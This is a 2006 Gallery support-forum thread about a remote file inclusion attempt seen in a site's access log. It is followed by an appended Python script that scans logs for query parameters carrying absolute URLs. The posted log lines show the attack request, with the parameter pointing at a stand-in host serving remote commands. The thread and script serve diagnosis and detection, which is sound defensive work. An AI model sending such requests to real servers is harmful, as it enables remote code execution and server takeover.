Attempted hack?

sorabji

Joined: 2005-12-08
Posts: 7
Posted: Fri, 2006-09-29 00:24

My access_log is showing a rash of requests that look like this:

www.infolab.cz - - [28/Sep/2006:17:43:29 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4770 "-" "libwww-perl/5.803"
www.infolab.cz - - [28/Sep/2006:17:44:18 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4752 "-" "libwww-perl/5.803"

/r/main.php is, of course, the location of my gallery main.php.

These requests are apparently trying to execute commands from a remote text file -- I changed the URL of that text file in these requests so as not to link anyone to the bad link. The text file contains a bunch of commands that might set up an IRC server.

Running Gallery 2.1.1, should I be worried about these requests?


Gallery version = 2.1.1 core 1.1.0.1
PHP version = 4.3.10 apache2handler
Webserver = Apache/2.0.50 (Fedora)
Database = mysql 3.23.58, lock.system=flock
Operating system = Linux

 
valiant

Joined: 2003-01-04
Posts: 32509
Posted: Fri, 2006-09-29 02:18

Don't worry. They may attempt to do something, but the input values for Gallery are well filtered. Furthermore, no official Gallery code / module / theme looks for an "r" GET / POST variable.
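Added example, not part of the thread and not Gallery code: a small Python check that scans Apache combined-format access log lines for the pattern shown in the first post, a query parameter whose value is an absolute URL. The function names, the regexes and the last two sample lines are assumptions made for this illustration; it also matches https, ftp and percent-encoded values, which goes beyond the plain http case in the post.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A parameter value that is itself an absolute URL (assumed scheme list).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_url_params(lines):
    """Return one finding per request whose query string carries an absolute URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so r=http%3A%2F%2F... is caught as well
        hits = [(k, v) for k, v in parse_qsl(target.query, keep_blank_values=True)
                if REMOTE_URL_RE.match(v.strip())]
        if hits:
            findings.append({
                "host": m.group("host"), "time": m.group("time"),
                "path": target.path, "params": hits,
                # 200 only means the script answered, not that the URL was used
                "status": int(m.group("status")), "agent": m.group("agent"),
            })
    return findings

def summarize(findings):
    """Count findings per (client host, user agent) to surface repeat scanners."""
    return Counter((f["host"], f["agent"]) for f in findings)

# First two lines are from the post; the last two are constructed for contrast.
SAMPLE = [
    'www.infolab.cz - - [28/Sep/2006:17:43:29 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4770 "-" "libwww-perl/5.803"',
    'www.infolab.cz - - [28/Sep/2006:17:44:18 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4752 "-" "libwww-perl/5.803"',
    '192.0.2.10 - - [28/Sep/2006:17:45:02 -0400] "GET /r/main.php?g2_itemId=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [28/Sep/2006:17:46:10 -0400] "GET /r/main.php?r=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 4760 "-" "ExampleScanner/1.0"',
]

if __name__ == "__main__":
    for f in find_remote_url_params(SAMPLE):
        print(f["time"], f["host"], f["path"], f["params"], f["status"])
    print(summarize(find_remote_url_params(SAMPLE)))
```

A hit marks a request worth reviewing; whether it matters depends on whether any installed script actually reads the flagged parameter, which is the point made in the reply above.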